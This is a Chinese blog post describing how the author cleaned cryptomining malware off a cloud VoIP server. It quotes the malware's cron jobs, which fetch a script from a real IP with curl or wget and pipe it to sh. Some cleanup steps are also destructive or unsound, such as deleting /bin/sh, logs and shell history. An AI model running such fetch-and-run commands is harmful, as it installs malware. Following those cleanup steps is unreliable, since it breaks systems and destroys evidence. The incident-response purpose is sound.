記一次伺服器被挖礦程式佔用的解決過程

阿新 • • 發佈：2019-01-22

公司有臺做voip的伺服器最近CPU總是跑滿，這機器自從交給廠家搭好環境後基本就沒怎麼管它，於是進去檢視程序，top了下（見下圖）
記一次伺服器被挖礦程式***的解決過程
這個叫wnTKYg的程序很詭異，已經把CPU吃光了，上網一查，原來是中了挖礦的馬。（啊，我的天。這只是一個單核1G記憶體的阿里雲主機）既然被***了，那就得幹掉它，下面是解決過程：

1：第一步要先找到這個wnTKYg檔案實體，對了還有一個叫ddg.2020的程序。

[[email protected] ~]$ find / -name wnTKYg
/tmp/wnTKYg
[[email protected] ~]$ find / -name ddg*
/tmp/ddg.2020

2：接著把這兩個檔案的可執行許可權拿掉。

[[email protected] ~]$ cd /tmp
[[email protected] /tmp]$ chmod -x ddg.2020 wnTKYg

3：殺掉這該死的程序。

[[email protected] /tmp]$ ps -ef | grep -v grep | egrep 'wnTKYg|ddg' | awk '{print $2}' | xargs kill -9

4：清除無用的定時任務。

[[email protected] /tmp]$ crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

這是挖礦程式生成的定時任務，不清除掉待會程序又起來了。

[[email protected] /tmp]$ echo > /var/spool/cron/root

因為這臺機器上沒有做定時任務，所以就直接清除掉了，如果有其他在用的定時任務，不要這樣哦。

5：刪除挖礦程式。

[[email protected] /tmp]$ rm -f ddg.2020 wnTKYg

6：清除.ssh/下的公鑰檔案。

[[email protected] ~/.ssh]$ cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUGqxNBCvqd+VNZTcSjyV3bs67sqwXSV+XztaY9QN/DDfeXEfWztdaXPbJvmLE34G
.........
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfxLBb/eKbi0TVVULI8ILVtbv2iaGM+eZbZoCWcD3v/eF1B/VkHAC1YwIhfqkUYudwhxV
.................

這臺機器並沒有上傳過公鑰檔案，所以這就是***者留下的咯，刪掉刪掉。

[[email protected] ~/.ssh]$ rm -f authorized_keys

至此，***就已經清理完畢了。

小結：

在網上查了一下，發現大部分挖礦***都發生在redis上，而我這臺伺服器並沒有部署redis，而是當時廠家給裝的一套voip環境，因此我懷疑是voip軟體的漏洞導致了此次事件，之後再聯絡廠家看看。通過這次伺服器被***的案例，再一次印證了安全的重要性，安全無小事，繼續努力吧。

繼上面的挖礦木馬解決後，很有自豪感，但是在今天2018-09-09收到阿里雲的態勢感知的通知又有挖礦病毒了，於是解決。。。

2018-09-09週五阿里雲態勢感知通知檢測到伺服器有異常檔案下載,當時沒太注意，執行下面操作解決問題（簡單針對於minerd處理）

1、執行 top -i命令檢視cpu 使用總過高,使用top -l 檢視到是minerd作祟，

2、果斷ps -ef | grep ‘minerd’ 檢視pid,

3、使用kill -9 程式的pid 殺死掉，

4、到 cd /tmp/下檢視是否存有臨時檔案，如果有rm -rf 刪除，沒有就算了

5、crontab -l 檢視是否有定時,有的話到cd /etc/crontab 檢視是否有陌生的定時任務，如果有也是直接刪除，

6、然後top 再檢視，成功了，然後查閱了資料，說redis 漏洞，果斷修改了ssh密碼，修改redis的埠,修改了登入資料庫密碼，一切看起來就是這麼簡單

xx.xx.xxx.xx（ixxxxx...）出現了可疑安全事件：Linux異常檔案下載，建議您立即登入雲盾-態勢感知控制檯檢視詳情和處理。

於是登入伺服器檢視。我嘞靠，輸入一條命令ls 反應比烏龜還慢，然後每條命令反應都在3秒才能出結果，靠，3秒男人，我可受不了，於是從花了一天時間才解決掉，廢話夠多了，看下面，

1、命令 top 檢視，我去，滿滿的cpu，但是怎麼看不到那個程序佔用了CPU呢

2、於是又使用crontab -l 檢視，赤裸裸定時任務，這又是什麼鬼，礦機不是解決了嗎？這那來的任務，

清除無用的定時任務。

這是挖礦程式生成的定時任務，不清除掉待會程序又起來了。

[[email protected] /tmp]$ echo > /var/spool/cron/root
[[email protected] /tmp]$ echo > /var/spool/cron/crontabs/root
[[email protected] /tmp]$ echo > /etc/cron.d/root

因為這臺機器上沒有做定時任務，所以就直接清除掉了，如果有其他在用的定時任務，不要這樣哦。

4、cd /tmp/ 下，三個莫名其妙出現的檔案，果斷 rm -rf 檔名刪除

注意：在/tmp/下有一個檔名字是 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)>

刪除這個檔案的時候報錯：-bash: syntax error near unexpected token `('

百度之後要這樣刪除 rm -rf Aegis-\<Guid\(5A2C30A2-A87D-490A-9281-6765EDAD7CBA\)\>

在每個括號前面加上\,因為在linux5.0之後，是不能帶有括號的，這個時候就需要轉譯了

5、ls -al 看下，果然還有隱藏檔案,通通刪除

6、去cd /etc/crontab ，刪除定時任務，然後top -i,得到如下，cup依然張立在哪裡，懵逼

7、top -b 多了一個python，幹啥的不知道，檢視刪除程序python

8、最後去檢視日誌，如下順著這個日誌一步一步走下去，

9、cd /etc,下rm -rf ld.so.preload

10、cd /usr/local/lib下 rm -rf libjdk.so

11、再去cd /etc/crontab ，檢視有沒有定時任務，有刪除，

12、去cd /tmp下,有也統統刪除，

13、top -b 居然有3個資源kworkerrds佔據cpu 33%,終於找到你，尼瑪，還好沒放棄，由於當時找到目標，太過激動沒截圖，因為已經下午5點了，花了大量時間找原因，看日誌，查資料，

14、於是果斷ps -ef | grep kworkerds，赤裸裸就是你

15、kill -9 pid ，history -c清除記錄（下面解釋）

16,top ,終於下來了，心累呀

17、之前花了大量時間檢視原因，原來是黑客通過在我日誌裡面留下了程式，我之前清除了minerd，然後又通過日誌裡面的程式進行了一個指令碼任務，通過這個指令碼獲取操作記錄，（為什麼history -c清除記錄），然後再次侵入我的伺服器，現在是21:00,心累，

18、對了，還有如下操作，這才完美收官。cd /var/log

19、可疑的日誌通通刪除,

20、記得修改所有密碼，記得history -c

上面的方法如果沒有效果可以結合下面的方法一起使用

A:先把定時任務刪除掉

rm -rf /etc/cron.d/root

rm -rf /var/spool/cron/crontabs

rm -rf /bin/sh /var/spool/cron/root

B:刪掉重啟系統後執行指令碼

rm -rf /bin/httpdns

C：刪掉挖礦執行指令碼

rm -rf /tmp/kworkerds

D: 刪除修top顯示命令的指令碼（導致top查詢不處理此挖礦程序）

rm -rf /usr/local/lib/libntp.so

E:刪除python執行檔案

rm -rf /tmp/.tmpa

F: 再用Top命令，就可以找出此耗cpu程序

7：kill 掉此程序

9：修改redis 密碼，最好修改bind 為127.0.0.1